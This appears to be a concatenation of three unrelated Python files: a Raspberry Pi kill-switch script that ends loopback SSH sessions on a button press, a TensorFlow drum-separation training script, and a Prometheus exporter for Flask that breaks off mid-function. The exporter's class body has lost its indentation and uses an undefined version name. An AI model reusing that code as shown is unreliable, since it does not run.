GPIO.setup(ledPin, GPIO.OUT)
GPIO.output(ledPin, GPIO.LOW)  # start with the LED off
def buttonCheck():
    """Poll the kill-switch button; on press, kill every loopback SSH session.

    Runs forever; intended to be started in its own process.
    """
    while True:
        # Pull-up input: a pressed button reads LOW (0). Use the buttonPin
        # constant instead of the hardcoded 18 the original polled.
        if not GPIO.input(buttonPin):
            print('button pressed')
            # get the list of pids for SSH sessions on loopback
            for user in psutil.users():
                if '127.0.0.1' in str(user.host):
                    subprocess.run(['kill', '-9', str(user.pid)])
        time.sleep(0.25)
def sshCheck():
    """Light the LED whenever at least one SSH session comes from loopback.

    Runs forever; intended to be started in its own process.
    """
    while True:
        local_session = any('127.0.0.1' in str(u.host) for u in psutil.users())
        GPIO.output(ledPin, GPIO.HIGH if local_session else GPIO.LOW)
        time.sleep(0.25)
if __name__ == '__main__':
    # Run button polling and session monitoring concurrently.
    for worker in (buttonCheck, sshCheck):
        Process(target=worker).start()
|
Training.py | from sacred import Experiment
import tensorflow as tf
import threading
import numpy as np
import os
import multiprocessing
import Datasets
from Input import Input as Input
from Input import batchgenerators as batchgen
import Models.WGAN_Critic
import Models.Unet
import Utils
import cPickle as pickle
import Test
import logging
# Route multiprocessing worker log output to stderr so the batch-generator
# subprocesses are visible during training/debugging.
logger = multiprocessing.log_to_stderr()
logger.setLevel(logging.DEBUG)
logger.warning('-----wtf?------')  # sanity check that logging is wired up
# logger = logging.getLogger('scope.name')
#
# file_log_handler = logging.FileHandler('logfile.log')
# logger.addHandler(file_log_handler)
#
# stderr_log_handler = logging.StreamHandler()
# logger.addHandler(stderr_log_handler)
#
# # nice output format
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# file_log_handler.setFormatter(formatter)
# stderr_log_handler.setFormatter(formatter)
#
# logger.info('Info message')
# logger.error('Error message')
# logger.setLevel('DEBUG')
# Sacred experiment object; @ex.config/@ex.capture/@ex.automain below attach to it.
ex = Experiment('Drum_Source_Separation')
experiment_id = 555 #np.random.randint(0, 10000)
@ex.config
def cfg():
    """Sacred config: model, training and data-input hyperparameters."""
    model_config = {"model_base_dir" : "checkpoints", # Base folder for model checkpoints
                    "log_dir" : "logs", # Base folder for logs files
                    "batch_size" : 32, # Batch size !!!64!!
                    "alpha" : 0.001, # Weighting for adversarial loss (unsupervised)
                    "beta" : 0.001, # Weighting for additive penalty (unsupervised)
                    "lam" : 10, # Weighting term lambda for WGAN gradient penalty
                    "init_disc_lr" : 5e-5, # Discriminator(s) learning rate
                    "init_sup_sep_lr" : 5e-5, # Supervised separator learning rate
                    "init_unsup_sep_lr" : 5e-5, # Unsupervised separator learning rate
                    "epoch_it" : 1000, # Number of supervised separator steps per epoch
                    "num_disc": 5, # Number of discriminator iterations per separator update
                    "num_frames" : 128, # DESIRED number of time frames in the spectrogram per sample (this can be increased when using U-net due to its limited output sizes)
                    "num_fft" : 512, # FFT Size
                    "num_hop" : 256, # FFT Hop size
                    'expected_sr' : 16384, # Downsample all audio input to this sampling rate
                    'mono_downmix' : True, # Whether to downsample the audio input
                    'cache_size' : 72, # was 64 Number of audio excerpts that are cached to build batches from !!!64!!
                    'num_workers' : 4, # was 4 Number of processes reading audio and filling up the cache
                    "duration" : 5, # Duration in seconds of the audio excerpts in the cache (excluding input context)
                    'min_replacement_rate' : .3, # roughly: how many cache entries to replace at least per batch on average. Can be fractional
                    'num_layers' : 4, # How many U-Net layers
                    }
    experiment_id = 555  # fixed run id (folder naming); see module-level note
@ex.capture
def test(model_config, audio_list, model_folder, load_model):
    """Evaluate a trained separator checkpoint on a list of audio tracks.

    Builds the separator graph, restores the checkpoint at `load_model`,
    accumulates the supervised MSE loss until the input queue is emptied,
    and logs the mean loss to TensorBoard.

    :param model_config: configuration dict (see cfg())
    :param audio_list: dataset partition to evaluate on
    :param model_folder: folder name used for the TensorBoard log dir
    :param load_model: checkpoint path to restore
    :return: mean MSE loss over the evaluated batches
    """
    # Determine input and output shapes, if we use U-net as separator.
    # Use // so freq_bins stays an int on Python 3 as well (shapes must be ints).
    freq_bins = model_config["num_fft"] // 2 + 1  # Make even number of freq bins
    disc_input_shape = [model_config["batch_size"], freq_bins-1, model_config["num_frames"],1]  # Shape of discriminator input
    separator_class = Models.Unet.Unet(model_config["num_layers"])
    sep_input_shape, sep_output_shape = separator_class.getUnetPadding(np.array(disc_input_shape))
    separator_func = separator_class.get_output

    # Placeholders and input normalisation
    input_ph, queue, [mix_context, acc, drums] = Input.get_multitrack_input(sep_output_shape[1:], model_config["batch_size"], name="input_batch", input_shape=sep_input_shape[1:])
    enqueue_op = queue.enqueue(input_ph)
    mix = Input.crop(mix_context, sep_output_shape)
    mix_norm, mix_context_norm, acc_norm, drum_norm = Input.norm(mix), Input.norm(mix_context), Input.norm(acc), Input.norm(drums)
    print("Testing...")

    # BUILD MODELS
    # Separator
    separator_acc_norm, separator_drums_norm = separator_func(mix_context_norm, reuse=False)

    # Supervised objective
    sup_separator_loss = tf.reduce_mean(tf.square(separator_drums_norm - drum_norm)) + tf.reduce_mean(tf.square(separator_acc_norm - acc_norm))
    tf.summary.scalar("sup_sep_loss", sup_separator_loss, collections=['sup', 'unsup'])
    global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False, dtype=tf.int64)

    # Start session and queue input threads
    sess = tf.Session()
    sess.run(tf.global_variables_initializer())
    writer = tf.summary.FileWriter(model_config["log_dir"] + os.path.sep + model_folder, graph=sess.graph)
    thread = threading.Thread(target=Input.load_and_enqueue, args=(sess, model_config, queue, enqueue_op, input_ph, audio_list))
    # BUGFIX: the original wrote `thread.deamon = True` (typo), which silently
    # set an unrelated attribute and left the loader thread non-daemonic.
    thread.daemon = True
    thread.start()

    # CHECKPOINTING
    # Load pretrained model to test
    restorer = tf.train.Saver(tf.global_variables(), write_version=tf.train.SaverDef.V2)
    print("Num of variables" + str(len(tf.global_variables())))
    restorer.restore(sess, load_model)
    print('Pre-trained model restored for testing')

    # Evaluation loop: run until the input queue is emptied
    _global_step = sess.run(global_step)
    print("Starting!")
    batches = 0
    total_loss = 0.0
    run = True
    while run:
        try:
            _sup_separator_loss = sess.run(
                sup_separator_loss)
            total_loss += _sup_separator_loss  # Aggregate loss measure
            batches += 1
        except Exception as e:
            # The TF queue raises once it is closed and empty; treat any
            # failure here as end-of-data, as the original did.
            print("Emptied queue - finished this epoch!")
            run = False
    mean_mse_loss = total_loss / float(batches)
    summary = tf.Summary(value=[tf.Summary.Value(tag="test_loss", simple_value=mean_mse_loss)])
    writer.add_summary(summary, global_step=_global_step)
    writer.flush()
    writer.close()
    print("Finished testing - Mean MSE: " + str(mean_mse_loss))
    thread.join()

    # Close session, clear computational graph
    sess.close()
    tf.reset_default_graph()
    return mean_mse_loss
@ex.capture
def train(model_config, sup_dataset, model_folder, unsup_dataset=None, load_model=None):
    """Train the separator for one epoch and save a checkpoint.

    Runs supervised MSE training, and additionally adversarial (WGAN critic)
    semi-supervised training when `unsup_dataset` is given.

    :param model_config: configuration dict (see cfg())
    :param sup_dataset: paired (mix, acc, drums) dataset for the supervised loss
    :param unsup_dataset: optional list of three unpaired datasets
        [mixes, accompaniments, drums] feeding the critics -- TODO confirm order
    :param model_folder: folder name for logs and checkpoints
    :param load_model: optional checkpoint path to continue training from
    :return: path of the checkpoint saved at the end of the epoch
    """
    # Determine input and output shapes
    # NOTE(review): `/` relies on Python-2 integer division (this file imports
    # cPickle); on Python 3 it would yield a float shape -- confirm before porting.
    freq_bins = model_config["num_fft"] / 2 + 1  # Make even number of freq bins
    disc_input_shape = [model_config["batch_size"], freq_bins - 1, model_config["num_frames"],1]  # Shape of discriminator input
    separator_class = Models.Unet.Unet(model_config["num_layers"])
    sep_input_shape, sep_output_shape = separator_class.getUnetPadding(np.array(disc_input_shape))
    separator_func = separator_class.get_output

    # Batch input workers
    # Creating the batch generators
    padding_durations = [float(sep_input_shape[2] - sep_output_shape[2]) * model_config["num_hop"] / model_config["expected_sr"] / 2.0, 0, 0]  # Input context that the input audio has to be padded with while reading audio files
    sup_batch_gen = batchgen.BatchGen_Paired(
        model_config,
        sup_dataset,
        sep_input_shape,
        sep_output_shape,
        padding_durations[0]
    )

    # Creating unsupervised batch generator if needed
    if unsup_dataset is not None:
        unsup_batch_gens = list()
        for i in range(3):
            # Only the mixture generator (i == 0) needs the padded input shape;
            # the source generators produce output-sized excerpts.
            shape = (sep_input_shape if i==0 else sep_output_shape)
            unsup_batch_gens.append(batchgen.BatchGen_Single(
                model_config,
                unsup_dataset[i],
                shape,
                padding_durations[i]
            ))

    print("Starting worker")
    sup_batch_gen.start_workers()
    print("Started worker!")

    if unsup_dataset is not None:
        for gen in unsup_batch_gens:
            print("Starting worker")
            gen.start_workers()
            print("Started worker!")

    # Placeholders and input normalisation
    mix_context,acc,drums = Input.get_multitrack_placeholders(sep_output_shape, sep_input_shape, "sup")
    mix = Input.crop(mix_context, sep_output_shape)
    mix_norm, mix_context_norm, acc_norm, drums_norm = Input.norm(mix), Input.norm(mix_context), Input.norm(acc), Input.norm(drums)
    if unsup_dataset is not None:
        mix_context_u,acc_u,drums_u = Input.get_multitrack_placeholders(sep_output_shape, sep_input_shape, "unsup")
        mix_u = Input.crop(mix_context_u, sep_output_shape)
        mix_norm_u, mix_context_norm_u, acc_norm_u, drums_norm_u = Input.norm(mix_u), Input.norm(mix_context_u), Input.norm(acc_u), Input.norm(drums_u)
    print("Training...")

    # BUILD MODELS
    # Separator
    separator_acc_norm, separator_drums_norm = separator_func(mix_context_norm, reuse=False)
    separator_acc, separator_drums = Input.denorm(separator_acc_norm), Input.denorm(separator_drums_norm)
    if unsup_dataset is not None:
        # Second (weight-shared, reuse=True) separator pass for the unpaired data
        separator_acc_norm_u, separator_drums_norm_u = separator_func(mix_context_norm_u, reuse=True)
        separator_acc_u, separator_drums_u = Input.denorm(separator_acc_norm_u), Input.denorm(separator_drums_norm_u)
        mask_loss_u = tf.reduce_mean(tf.square(mix_u - separator_acc_u - separator_drums_u))
    mask_loss = tf.reduce_mean(tf.square(mix - separator_acc - separator_drums))

    # SUMMARIES FOR INPUT AND SEPARATOR
    tf.summary.scalar("mask_loss", mask_loss, collections=["sup", "unsup"])
    if unsup_dataset is not None:
        tf.summary.scalar("mask_loss_u", mask_loss_u, collections=["unsup"])
        tf.summary.scalar("acc_norm_mean_u", tf.reduce_mean(acc_norm_u), collections=["acc_disc"])
        tf.summary.scalar("drums_norm_mean_u", tf.reduce_mean(drums_norm_u), collections=["drums_disc"])
        tf.summary.scalar("acc_sep_norm_mean_u", tf.reduce_mean(separator_acc_norm_u), collections=["acc_disc"])
        tf.summary.scalar("drums_sep_norm_mean_u", tf.reduce_mean(separator_drums_norm_u), collections=["drums_disc"])
    tf.summary.scalar("acc_norm_mean", tf.reduce_mean(acc_norm), collections=['sup'])
    tf.summary.scalar("drums_norm_mean", tf.reduce_mean(drums_norm), collections=['sup'])
    tf.summary.scalar("acc_sep_norm_mean", tf.reduce_mean(separator_acc_norm), collections=['sup'])
    tf.summary.scalar("drums_sep_norm_mean", tf.reduce_mean(separator_drums_norm), collections=['sup'])
    tf.summary.image("sep_acc_norm", separator_acc_norm, collections=["sup", "unsup"])
    tf.summary.image("sep_drums_norm", separator_drums_norm, collections=["sup", "unsup"])

    # BUILD DISCRIMINATORS, if unsupervised training
    unsup_separator_loss = 0
    if unsup_dataset is not None:
        disc_func = Models.WGAN_Critic.dcgan

        # Define real and fake inputs for both discriminators - if separator output and discriminator input shapes do not fit perfectly, we will do a centre crop and only discriminate that part
        acc_real_input = Input.crop(acc_norm_u, disc_input_shape)
        acc_fake_input = Input.crop(separator_acc_norm_u, disc_input_shape)
        drums_real_input = Input.crop(drums_norm_u, disc_input_shape)
        drums_fake_input = Input.crop(separator_drums_norm_u, disc_input_shape)

        #WGAN
        acc_disc_loss, acc_disc_real, acc_disc_fake, acc_grad_pen, acc_wasserstein_dist = \
            Models.WGAN_Critic.create_critic(model_config, real_input=acc_real_input, fake_input=acc_fake_input, scope="acc_disc", network_func=disc_func)
        drums_disc_loss, drums_disc_real, drums_disc_fake, drums_grad_pen, drums_wasserstein_dist = \
            Models.WGAN_Critic.create_critic(model_config, real_input=drums_real_input, fake_input=drums_fake_input, scope="drums_disc", network_func=disc_func)

        L_u = - tf.reduce_mean(drums_disc_fake) - tf.reduce_mean(acc_disc_fake)  # WGAN based loss for separator (L_u in paper)
        unsup_separator_loss = model_config["alpha"] * L_u + model_config["beta"] * mask_loss_u  # Unsupervised loss for separator: WGAN-based loss L_u and additive penalty term (mask loss), weighted by alpha and beta (hyperparameters)

    # Supervised objective: MSE in log-normalized magnitude space
    sup_separator_loss = tf.reduce_mean(tf.square(separator_drums_norm - drums_norm)) + \
                         tf.reduce_mean(tf.square(separator_acc_norm - acc_norm))
    separator_loss = sup_separator_loss + unsup_separator_loss  # Total separator loss: Supervised + unsupervised loss

    # TRAINING CONTROL VARIABLES
    global_step = tf.get_variable('global_step', [],
                                  initializer=tf.constant_initializer(0), trainable=False, dtype=tf.int64)
    increment_global_step = tf.assign(global_step, global_step + 1)
    disc_lr = tf.get_variable('disc_lr', [],
                              initializer=tf.constant_initializer(model_config["init_disc_lr"], dtype=tf.float32), trainable=False)
    unsup_sep_lr = tf.get_variable('unsup_sep_lr', [],
                                   initializer=tf.constant_initializer(model_config["init_unsup_sep_lr"], dtype=tf.float32), trainable=False)
    sup_sep_lr = tf.get_variable('sup_sep_lr', [],
                                 initializer=tf.constant_initializer(model_config["init_sup_sep_lr"], dtype=tf.float32),
                                 trainable=False)

    # Set up optimizers
    separator_vars = Utils.getTrainableVariables("separator")
    print("Sep_Vars: " + str(Utils.getNumParams(separator_vars)))
    acc_disc_vars, drums_disc_vars = Utils.getTrainableVariables("acc_disc"), Utils.getTrainableVariables("drums_disc")
    print("Drums_Disc_Vars: " + str(Utils.getNumParams(drums_disc_vars)))
    print("Acc_Disc_Vars: " + str(Utils.getNumParams(acc_disc_vars)))
    if unsup_dataset is not None:
        with tf.variable_scope("drums_disc_solver"):
            drums_disc_solver = tf.train.AdamOptimizer(learning_rate=disc_lr).minimize(drums_disc_loss, var_list=drums_disc_vars, colocate_gradients_with_ops=True)
        with tf.variable_scope("acc_disc_solver"):
            acc_disc_solver = tf.train.AdamOptimizer(learning_rate=disc_lr).minimize(acc_disc_loss, var_list=acc_disc_vars, colocate_gradients_with_ops=True)
        with tf.variable_scope("unsup_separator_solver"):
            unsup_separator_solver = tf.train.AdamOptimizer(learning_rate=unsup_sep_lr).minimize(
                separator_loss, var_list=separator_vars, colocate_gradients_with_ops=True)
    else:
        with tf.variable_scope("separator_solver"):
            sup_separator_solver = (tf.train.AdamOptimizer(learning_rate=sup_sep_lr).minimize(sup_separator_loss, var_list=separator_vars, colocate_gradients_with_ops=True))

    # SUMMARIES FOR DISCRIMINATORS AND LOSSES
    acc_disc_summaries = tf.summary.merge_all(key="acc_disc")
    drums_disc_summaries = tf.summary.merge_all(key="drums_disc")
    tf.summary.scalar("sup_sep_loss", sup_separator_loss, collections=['sup', "unsup"])
    tf.summary.scalar("unsup_sep_loss", unsup_separator_loss, collections=['unsup'])
    tf.summary.scalar("sep_loss", separator_loss, collections=["sup", "unsup"])
    sup_summaries = tf.summary.merge_all(key='sup')
    unsup_summaries = tf.summary.merge_all(key='unsup')

    # Start session
    config = tf.ConfigProto()
    config.gpu_options.allow_growth=True
    sess = tf.Session(config=config)
    sess.run(tf.global_variables_initializer())
    writer = tf.summary.FileWriter(model_config["log_dir"] + os.path.sep + model_folder, graph=sess.graph)

    # CHECKPOINTING
    # Load pretrained model to continue training, if we are supposed to
    if load_model is not None:
        restorer = tf.train.Saver(tf.global_variables(), write_version=tf.train.SaverDef.V2)
        print("Num of variables: " + str(len(tf.global_variables())))
        restorer.restore(sess, load_model)
        print('Pre-trained model restored from file ' + load_model)

    saver = tf.train.Saver(tf.global_variables(), write_version=tf.train.SaverDef.V2)

    # Start training loop
    run = True
    _global_step = sess.run(global_step)
    _init_step = _global_step
    it = 0  # separate step counter for the per-critic-iteration summaries
    while run:
        if unsup_dataset is not None:
            # TRAIN DISCRIMINATORS
            for disc_it in range(model_config["num_disc"]):
                batches = list()
                for gen in unsup_batch_gens:
                    batches.append(gen.get_batch())
                _, _acc_disc_summaries = sess.run(
                    [acc_disc_solver, acc_disc_summaries],
                    feed_dict={mix_context_u: batches[0], acc_u: batches[1]}
                )
                _, _drums_disc_summaries = sess.run(
                    [drums_disc_solver, drums_disc_summaries],
                    feed_dict={mix_context_u: batches[0], drums_u: batches[2]}
                )
                writer.add_summary(_acc_disc_summaries, global_step=it)
                writer.add_summary(_drums_disc_summaries, global_step=it)
                it += 1

        # TRAIN SEPARATOR
        sup_batch = sup_batch_gen.get_batch()
        if unsup_dataset is not None:
            # SUP + UNSUPERVISED TRAINING
            unsup_batches = list()
            for gen in unsup_batch_gens:
                unsup_batches.append(gen.get_batch())
            _, _unsup_summaries, _sup_summaries = sess.run(
                [unsup_separator_solver, unsup_summaries, sup_summaries],
                feed_dict={mix_context: sup_batch[0], acc: sup_batch[1], drums: sup_batch[2],
                           mix_context_u: unsup_batches[0], acc_u:unsup_batches[1], drums_u:unsup_batches[2]}
            )
            writer.add_summary(_unsup_summaries, global_step=_global_step)
        else:
            # PURELY SUPERVISED TRAINING
            _, _sup_summaries = sess.run(
                [sup_separator_solver, sup_summaries],
                feed_dict={mix_context: sup_batch[0], acc: sup_batch[1], drums: sup_batch[2]})
            writer.add_summary(_sup_summaries, global_step=_global_step)

        # Increment step counter, check if maximum iterations per epoch is achieved and stop in that case
        _global_step = sess.run(increment_global_step)
        if _global_step - _init_step > model_config["epoch_it"]:
            run = False
            print("Finished training phase, stopping batch generators")
            sup_batch_gen.stop_workers()
            if unsup_dataset is not None:
                for gen in unsup_batch_gens:
                    gen.stop_workers()

    # Epoch finished - Save model
    print("Finished epoch!")
    save_path = saver.save(sess, model_config["model_base_dir"] + os.path.sep + model_folder + os.path.sep + model_folder, global_step=int(_global_step))

    # Close session, clear computational graph
    writer.flush()
    writer.close()
    sess.close()
    tf.reset_default_graph()
    return save_path
@ex.capture
def optimise(dataset, supervised):
    """Train the separation system (supervised or semi-supervised).

    Training stops once validation loss fails to improve; the best
    checkpoint is then evaluated on the test partition.

    :param dataset: dict with 'train_sup', 'train_unsup', 'valid', 'test' partitions
    :param supervised: True for purely supervised, False for semi-supervised
    :return: (path to checkpoint file of best model, test loss of best model)
    """
    if supervised:
        unsup_dataset = None
        model_folder = str(experiment_id) + "_sup"
    else:
        unsup_dataset = dataset["train_unsup"]
        model_folder = str(experiment_id) + "_semisup"

    epoch = 0
    worse_epochs = 0
    best_loss = 10000
    best_model_path = ""
    model_path = None
    while worse_epochs < 1:  # TODO: change back to 1!
        print("EPOCH: " + str(epoch))
        model_path = train(sup_dataset=dataset["train_sup"], unsup_dataset=unsup_dataset,
                           model_folder=model_folder, load_model=model_path)
        curr_loss = test(audio_list=dataset["valid"], model_folder=model_folder, load_model=model_path)
        epoch += 1
        if curr_loss < best_loss:
            print("Performance on validation set improved from " + str(best_loss) + " to " + str(curr_loss))
            worse_epochs = 0
            best_loss = curr_loss
            best_model_path = model_path
        else:
            worse_epochs += 1
            print("Performance on validation set worsened to " + str(curr_loss))

    print("TRAINING FINISHED - TESTING WITH BEST MODEL " + best_model_path)
    test_loss = test(audio_list=dataset["test"], model_folder=model_folder, load_model=best_model_path)
    return best_model_path, test_loss
@ex.automain
def dsd_100_experiment(model_config):
    """Experiment entry point: load the cached dataset, evaluate the
    supervised baseline checkpoint, then train and evaluate the
    semi-supervised model.
    """
    # Set up data input
    if os.path.exists('dataset.pkl'):
        # BUGFIX: open in binary mode -- pickle data is binary; text mode can
        # corrupt it and fails outright on Python 3.
        with open('dataset.pkl', 'rb') as file:
            dataset = pickle.load(file)
        print("Loaded dataset from pickle!")
    else:
        '''
        Create dataset structure comprised of supervised, unsupervised, validation and test partitions
        # MODIFY BELOW TO INSERT DSD100, MedleyDB, CCMixter datasets.
        # Each returned item from the dataset reading function (dsd_train, dsd_test, mdb, ccm, ikala) has to be of the following structure:
        # List of 3 elements, each of which is a List of Sample objects (instantiations of the Sample class -
        # you need to create these as part of your dataset reading function). Each sample represents an audio track
        # The list of 3 elements has to be in order: A list of mixtures, accompaniments and drums, in that order.
        # Example: dsd_train[1] - List of Sample objects, each sample object represents an accompaniment audio file
        # The lists have to be matched: The mixture audio at dsd_train[0][20] has to have its accompaniment at dsd_train[1][20] and drums at dsd_train[2][20]
        # This means that for iKala and MedleyDB you need to generate separate vocal and accompaniment audio manually first!
        # For MedleyDB, we mix together stems with/without drums to generate the drum and accompaniment track respectively, then add those signals together for the mixture track, to ensure mix=acc+drums
        '''
        ###################### MODIFY BELOW
        # dsd_train, dsd_test = Datasets.getDSDFilelist("DSD100.xml")
        # mdb = Datasets.getMedleyDB("MedleyDB.xml")
        # ccm = Datasets.getCCMixter("CCMixter.xml")
        # ikala = Datasets.getIKala("iKala.xml")
        ###################### MODIFY ABOVE
        # Draw randomly from datasets
        # dataset = dict()
        # dataset["train_sup"] = dsd_train
        # dataset["train_unsup"] = []
        # dataset["valid"] = [dsd_test[0][:25], dsd_test[1][:25], dsd_test[2][:25]]
        # dataset["test"] = [dsd_test[0][25:], dsd_test[1][25:], dsd_test[2][25:]]
        # for ds in [mdb, ccm, ikala]:
        #     num = len(ds[0]) // 3
        #     for i in range(3):
        #         dataset["train_unsup"][i].extend(ds[i][:num])
        #         dataset["valid"][i].extend(ds[i][num:2 * num])
        #         dataset["test"][i].extend(ds[i][2 * num:])
        # dataset["train_sup"] = zip(dataset["train_sup"][0], dataset["train_sup"][1], dataset["train_sup"][2])
        # dataset["valid"] = zip(dataset["valid"][0], dataset["valid"][1], dataset["valid"][2])
        # dataset["test"] = zip(dataset["test"][0], dataset["test"][1], dataset["test"][2])
        # with open('dataset.pkl', 'wb') as file:
        #     pickle.dump(dataset, file)
        # print("Created dataset structure")
        # BUGFIX: the construction code above is commented out, so falling
        # through here used to crash later with a NameError on `dataset`.
        # Fail fast with an actionable message instead.
        raise RuntimeError("dataset.pkl not found - fill in the dataset construction code above and rerun.")

    # Optimize in a supervised fashion until validation loss worsens
    sup_model_path = "/home/ubuntu/AAS/checkpoints/111_sup/111_sup-3003"
    # sup_model_path, sup_loss = optimise(dataset=dataset, supervised=True)
    #print("Supervised training finished! Saved model at " + sup_model_path + ". Performance: " + str(sup_loss))
    sup_scores = Test.bss_evaluate(model_config, dataset=dataset["test"],load_model=sup_model_path)
    print(sup_scores)

    # Train same network architecture semi-supervised
    unsup_model_path, unsup_loss = optimise(dataset=dataset, supervised=False)
    print("Unsupervised training finished! Performance: " + str(unsup_loss))
    unsup_scores = Test.bss_evaluate(model_config, dataset=dataset["test"],load_model=unsup_model_path)
    print(unsup_scores)
__init__.py | import inspect
import functools
import threading
from timeit import default_timer
from flask import request, make_response
from flask import Flask, Response
from werkzeug.exceptions import HTTPException
from prometheus_client import Counter, Histogram, Gauge, Summary
from prometheus_client import generate_latest, CONTENT_TYPE_LATEST
from prometheus_client import REGISTRY as DEFAULT_REGISTRY
class PrometheusMetrics(object):
"""
Prometheus metrics export configuration for Flask.
The default metrics include a Histogram for HTTP request latencies
and number of HTTP requests plus a Counter for the total number
of HTTP requests.
Sample usage:
app = Flask(__name__)
metrics = PrometheusMetrics(app)
# static information as metric
metrics.info('app_info', 'Application info', version='1.0.3')
@app.route('/')
def main():
pass # requests tracked by default
@app.route('/skip')
@metrics.do_not_track()
def skip():
pass # default metrics are not collected
@app.route('/<item_type>')
@metrics.do_not_track()
@metrics.counter('invocation_by_type', 'Number of invocations by type',
labels={'item_type': lambda: request.view_args['type']})
def by_type(item_type):
pass # only the counter is collected, not the default metrics
@app.route('/long-running')
@metrics.gauge('in_progress', 'Long running requests in progress')
def long_running():
pass
@app.route('/status/<int:status>')
@metrics.do_not_track()
@metrics.summary('requests_by_status', 'Request latencies by status',
labels={'status': lambda r: r.status_code})
@metrics.histogram('requests_by_status_and_path', 'Request latencies by status and path',
labels={'status': lambda r: r.status_code, 'path': lambda: request.path})
def echo_status(status):
return 'Status: %s' % status, status
Label values can be defined as callables:
- With a single argument that will be the Flask Response object
- Without an argument, possibly to use with the Flask `request` object
"""
def __init__(self, app, path='/metrics', export_defaults=True,
             buckets=None, registry=DEFAULT_REGISTRY):
    """Set up Prometheus metrics export for a Flask application.

    :param app: the Flask application
    :param path: the metrics path (defaults to `/metrics`);
        pass a falsy value to skip registering the endpoint
    :param export_defaults: expose all HTTP request latencies
        and number of HTTP requests
    :param buckets: the time buckets for request latencies
        (will use the default when `None`)
    :param registry: the Prometheus Registry to use
    """
    self.registry = registry
    self.app = app
    self.version = __version__

    if path:
        self.register_endpoint(path)
    if export_defaults:
        self.export_defaults(buckets)
def register_endpoint(self, path, app=None):
    """Register the metrics endpoint on a Flask application.

    :param path: the path of the endpoint
    :param app: the Flask application to register the endpoint on
        (defaults to the application registered with this class)
    """
    target_app = self.app if app is None else app

    @target_app.route(path)
    @self.do_not_track()
    def prometheus_metrics():
        # Optional ?name[]=... query args restrict which metrics are emitted.
        reg = self.registry
        requested = request.args.getlist('name[]')
        if requested:
            reg = reg.restricted_registry(requested)
        return generate_latest(reg), 200, {'Content-Type': CONTENT_TYPE_LATEST}
def start_http_server(self, port, host='0.0.0.0', endpoint='/metrics'):
    """
    Start an HTTP server for exposing the metrics.
    This will be an individual Flask application,
    not the one registered with this class.

    :param port: the HTTP port to expose the metrics endpoint on
    :param host: the HTTP host to listen on (default: `0.0.0.0`)
    :param endpoint: the URL path to expose the endpoint on
        (default: `/metrics`)
    """
    app = Flask('prometheus-flask-exporter-%d' % port)
    self.register_endpoint(endpoint, app)

    def run_app():
        app.run(host=host, port=port)

    # Daemon thread so the exporter never blocks interpreter shutdown.
    # (Uses the `daemon` attribute; Thread.setDaemon() is deprecated.)
    thread = threading.Thread(target=run_app)
    thread.daemon = True
    thread.start()
def export_defaults(self, buckets=None):
    """
    Export the default metrics:
    - HTTP request latencies
    - Number of HTTP requests

    :param buckets: the time buckets for request latencies
        (will use the default when `None`)
    """
    # use the default buckets from prometheus_client if not given here
    buckets_as_kwargs = {}
    if buckets is not None:
        buckets_as_kwargs['buckets'] = buckets

    # Request latency histogram, labelled by method, path and response status.
    histogram = Histogram(
        'flask_http_request_duration_seconds',
        'Flask HTTP request duration in seconds',
        ('method', 'path', 'status'),
        registry=self.registry,
        **buckets_as_kwargs
    )

    # Total request counter, labelled by method and response status.
    counter = Counter(
        'flask_http_request_total',
        'Total number of HTTP requests',
        ('method', 'status'),
        registry=self.registry
    )

    # Static exporter metadata (version) exposed as an info-style gauge.
    self.info(
        'flask_exporter_info',
        'Information about the Prometheus Flask exporter',
        version=self.version
    )

    def before_request():
        # Stamp the request so after_request can compute the latency.
        request.prom_start_time = default_timer()

    def after_request(response):
        # Handlers decorated with do_not_track() set this flag and are skipped.
        if hasattr(request, 'prom_do_not_track'):
            return response

        total_time = max(default_timer() - request.prom_start_time, 0)
        histogram.labels(
            request.method, request.path, response.status_code
        ).observe(total_time)

        counter.labels(request.method, response.status_code).inc()

        return response

    self.app.before_request(before_request)
    self.app.after_request(after_request)
def histogram(self, name, description, labels=None, **kwargs):
    """
    Use a Histogram to track the execution time and invocation count
    of the method.

    :param name: the name of the metric
    :param description: the description of the metric
    :param labels: a dictionary of `{labelname: callable_or_value}` for labels
    :param kwargs: additional keyword arguments for creating the Histogram
    """
    def record(metric, time):
        # Histograms observe the elapsed request time.
        metric.observe(time)

    return self._track(Histogram, record, kwargs, name, description, labels,
                       registry=self.registry)
def summary(self, name, description, labels=None, **kwargs):
    """
    Use a Summary to track the execution time and invocation count
    of the method.

    :param name: the name of the metric
    :param description: the description of the metric
    :param labels: a dictionary of `{labelname: callable_or_value}` for labels
    :param kwargs: additional keyword arguments for creating the Summary
    """
    def record(metric, time):
        # Summaries observe the elapsed request time.
        metric.observe(time)

    return self._track(Summary, record, kwargs, name, description, labels,
                       registry=self.registry)
def gauge(self, name, description, labels=None, **kwargs):
    """
    Use a Gauge to track the number of invocations in progress
    for the method.

    :param name: the name of the metric
    :param description: the description of the metric
    :param labels: a dictionary of `{labelname: callable_or_value}` for labels
    :param kwargs: additional keyword arguments for creating the Gauge
    """
    def enter(metric):
        # Called before the handler runs: one more request in progress.
        metric.inc()

    def leave(metric, time):
        # Called after the handler finishes: request no longer in progress.
        metric.dec()

    return self._track(Gauge, leave, kwargs, name, description, labels,
                       registry=self.registry, before=enter)
def counter(self, name, description, labels=None, **kwargs):
    """
    Use a Counter to track the total number of invocations of the method.

    :param name: the name of the metric
    :param description: the description of the metric
    :param labels: a dictionary of `{labelname: callable_or_value}` for labels
    :param kwargs: additional keyword arguments for creating the Counter
    """
    def record(metric, time):
        # Counters just count invocations; the elapsed time is ignored.
        metric.inc()

    return self._track(Counter, record, kwargs, name, description, labels,
                       registry=self.registry)
@staticmethod
def _track(metric_type, metric_call, metric_kwargs, name, description, labels,
           registry, before=None):
    """
    Internal method decorator logic.

    :param metric_type: the type of the metric from the `prometheus_client` library
    :param metric_call: the invocation to execute as a callable with `(metric, time)`
    :param metric_kwargs: additional keyword arguments for creating the metric
    :param name: the name of the metric
    :param description: the description of the metric
    :param labels: a dictionary of `{labelname: callable_or_value}` for labels
    :param before: an optional callable to invoke before executing the
        request handler method accepting the single `metric` argument
    :param registry: the Prometheus Registry to use
    """
    if labels is not None and not isinstance(labels, dict):
        raise TypeError('labels needs to be a dictionary of {labelname: callable}')

    label_names = labels.keys() if labels else tuple()
    parent_metric = metric_type(
        name, description, labelnames=label_names, registry=registry,
        **metric_kwargs
    )

    def label_value(f):
